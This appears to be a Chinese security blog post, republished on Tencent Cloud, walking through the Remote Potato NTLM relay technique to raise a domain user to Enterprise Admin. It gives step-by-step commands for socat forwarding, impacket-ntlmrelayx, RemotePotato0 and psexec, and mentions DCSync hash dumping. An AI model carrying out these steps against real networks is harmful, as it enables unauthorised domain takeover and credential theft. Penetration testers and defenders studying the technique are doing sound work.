前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >内网渗透之从域用户到企业管理源用户

内网渗透之从域用户到企业管理源用户

作者头像
Al1ex
发布2024-07-16 15:01:18
910
发布2024-07-16 15:01:18
举报
文章被收录于专栏:网络安全攻防
文章前言

NTLM中继是一种众所周知的技术,主要用于在网络内的服务器上建立某种立足点或用于权限提升,这种攻击在没有为LDAP和SMB协议启用签名的网络中是可行的,此外使用高权限的帐户对服务器和工作站进行身份验证的域管理员可能会给攻击者提供完整域信息泄露的可能性,因为他们的凭据可以通过LSASS或使用Remote Potato技术进行转储

Remote Potato是Antonio Cocomazzi和Andrea Pierini发现的一种技术,它允许攻击者将其权限从域用户提升到Enterprise Admin,此技术执行跨协议中继以实现NTLM反射攻击,并将提升的NTLM身份验证中继到域控制器以实现权限提升

权限提升
前提条件
  • 具有Domain Administrator特权的用户已登录到主机或通过远程桌面登录主机
  • 攻击者已获得对主机的初始访问权限,或者已通过WinRM或SSH访问
  • LDAP和SMB签名未配置
权限提升

Step 1:首先执行以下命令查看域内Domain Administrator特权用户所在主机的PS配置信息:

代码语言:javascript
复制
Get-PSSessionConfiguration

PS:如果没有启用PS可以通过以下命令启动

代码语言:javascript
复制
Enable-PSremoting
Set-Item WSMan:\localhost\Client\TrustedHosts -Value 10.0.0.3(攻击主机IP地址)  //主要用于信任并接受来自攻击主机的连接

Step 2:执行以下命令与目标主机建立PowerShell会话

代码语言:javascript
复制
pwsh
Enter-PSSession -ComputerName 10.0.0.2 -Authentication Negotiate -Credential $(get-credential)

Step 3:运行以下命令在终端输出时转为后台作业,并通过socat将传入的流量转发回RPC侦听器

代码语言:javascript
复制
sudo stty -tostop
sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.2:9998 &

Step 4:在攻击主机上使用一个监听器(HTTP)接收NTLM身份验证并将其中继到DC,这里的域用户"pentestlab"用于权限提升,10.0.0.1为dc的IP地址

代码语言:javascript
复制
sudo impacket-ntlmrelayx -t ldap://10.0.0.1 --no-wcf-server --escalate-user pentestlab

Step 5:在攻击主机的powershell端)执行Remote Potato,这里的两个参数分别为用于接收经过身份验证的呼叫的主机(攻击主机的IP地址)的IP地址和RPC端口

https://github.com/antonioCoco/RemotePotato0

代码语言:javascript
复制
.\RemotePotato0.exe -r 10.0.0.3 -p 9998

之后可以检索到NTLM type 3 AUTH身份验证消息,然后将其中继到DC,以便通过LDAP进行身份验证,NTLM type 3 AUTH消息包含客户端对服务器质询的响应、域、用户名和主机信息:

目标用户将被添加到Enterprise Admins组,因为DC上的更改将从域管理员的角度执行

Step :6:之后执行"impacket psexec"模块或任何其他连接(RDP到域控制器等)验证用户是否已获得提升的权限,由于用户对域具有复制权限,因此也可以使用DCSync作为更隐蔽的方法来转储来自域的信息(例如域密码散列)

代码语言:javascript
复制
impacket-psexec 'purple/pentestlab:Password123@10.0.0.1'

当前权限为system权限:

之后pentstlab用户也成为了Enterprise Admin组的一员:

代码语言:javascript
复制
net user pentestlab

演示视频:

相关扩展

当目标域上存在域管理员会话时也可以直接从本地管理员提升到企业管理员(Cross Session Attack):

参考链接

https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop/

https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/

推 荐 阅 读

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-07-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章前言
  • 权限提升
    • 前提条件
      • 权限提升
      • 相关扩展
      • 参考链接
      相关产品与服务
      多因子身份认证
      多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档